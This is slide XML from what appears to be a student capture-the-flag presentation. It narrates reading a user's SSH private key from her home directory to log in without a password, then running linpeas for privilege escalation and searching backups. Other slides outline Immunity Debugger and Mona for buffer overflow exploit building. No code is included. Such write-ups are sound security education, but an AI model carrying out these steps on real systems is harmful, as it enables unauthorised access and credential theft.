            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Mina Ghattas</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blue lock with white text&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018843F3-9CA2-31C9-134E-0058E0867DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="1420" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079812" y="805516"/>
            <a:ext cx="8032376" cy="4074026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364751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85995-13B6-D96B-FEE7-5E862F4FA836}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55DCB4F-8912-F83C-CC11-7BD99B2DE130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2691" r="2916" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="866422" y="99503"/>
            <a:ext cx="9898742" cy="3329497"/>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422" y="3517997"/>
            <a:ext cx="10459156"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E0E58A-C461-2151-347E-663D94DFF415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478972" y="3854885"/>
            <a:ext cx="10874828" cy="2384552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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But I didn't get anything from it as it didn't have any visible passwords that I can use.</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I searched on how to access a server without the user password and found out it can be done by the ssh keys that belongs to every user alone.</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I tried the user called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shirohige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as it was mentioned in the logs endpoint and also it was the only user in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/passwd file beside laurel.</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So I was able to get her ssh key by going to her home then /.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41366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EE8F1-A2EB-A012-2A18-1FA1DD8D87FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1641752"/>
            <a:ext cx="4648200" cy="1787248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5206D5C8-589F-0BB4-67B7-41AB255E2388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4386881"/>
            <a:ext cx="4391024" cy="1047900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mohab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Yaser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                </a:schemeClr>
              </a:solidFill>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descr="A bowl with water on it&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89470989-D543-072F-F780-602C7FF25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932" y="1733853"/>
            <a:ext cx="4369112" cy="2297307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182851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E97884B-2E0F-E1C6-FD2D-BAF5DD7CE956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-1325880" y="1947672"/>
            <a:ext cx="5961888" cy="2788920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABB23EC-D5C1-4C2A-809A-61E5B377B546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255183483"/>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3B3B8-8036-CF6C-89C2-834F06139AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Immunity Debugger</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0C1E79-DC9B-BAC6-AD15-230F21321AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3741076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Immunity Debugger helps you understand and control the behavior of a vulnerable application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Control instruction pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Setting Breakpoints.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Crafting Exploit Payloads</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302466F5-4213-9A5A-7EA9-197C9225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889" y="2038817"/>
            <a:ext cx="6903720" cy="4765009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286074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8FD600-FE82-7D3B-C456-C7F52A53CC7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468B8-EDD9-4CFF-D764-D66B23C86D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Mona</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CBDE51-0E3B-EC89-C701-0EFE164912BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3410712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Its a powerful script created to extend the functionality of Immunity Debugger.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Its used in finding JMP/ESP Addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Generating Exploit Payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Pattern Creation and Offset Calculation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Identifying Safe Modules</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1900"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2672549A-E2A3-486F-756D-71C062228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206" y="2137209"/>
            <a:ext cx="6903720" cy="4215806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120575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30FFE-5F4F-D1EA-62FA-B08BF16B1607}"/>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9722C4F2-F826-749F-9234-1A8897D1CC6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="1459907"/>
            <a:ext cx="10175630" cy="767904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I used this key to ssh into the machine without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shirohige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> password, and got the user flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FC1A21-C947-ED6E-B9EB-F75E4C583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435750"/>
            <a:ext cx="10515595" cy="3838191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79976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computer screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A188CF6-9905-E076-7BAC-E3672139B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914" y="1014480"/>
            <a:ext cx="10872172" cy="233751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D2C371E0-F715-49E9-2341-41D1C037D4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481629" y="3998019"/>
            <a:ext cx="10872172" cy="2216512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">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As I logged into the machine, I tried to install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>linpeas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to escalate my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>privileages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and become a root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" rtl="0">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It gave me a lot of information but nothing worked so far, like a hash for the admin password but I couldn't crack it by anything.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>As shown in the figure above, a database dump was shown but the password hash was a dead end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261860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960D7E6-2E41-91F2-4BD5-B93EEC17D29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189515" y="4049408"/>
            <a:ext cx="3981854" cy="2216513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Mohamed Wael</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>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descr="A blue rectangle with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736C2754-B789-DEC3-2131-7D484EB29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850" y="704504"/>
            <a:ext cx="8960435" cy="334490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21099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A1FF8-B2AD-024C-0537-A2095E18794F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="5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AB8A5C-A229-2FEF-58B5-DD9B866EF133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>linpeas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> report was a dead end except the backup folders section that told me there is a backup in two places which are the opt and var directories.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I visited the two directories and found a putty sessions backup file in the opt directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The putty tool is used for ssh connections and file transferring so it might be important backup file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
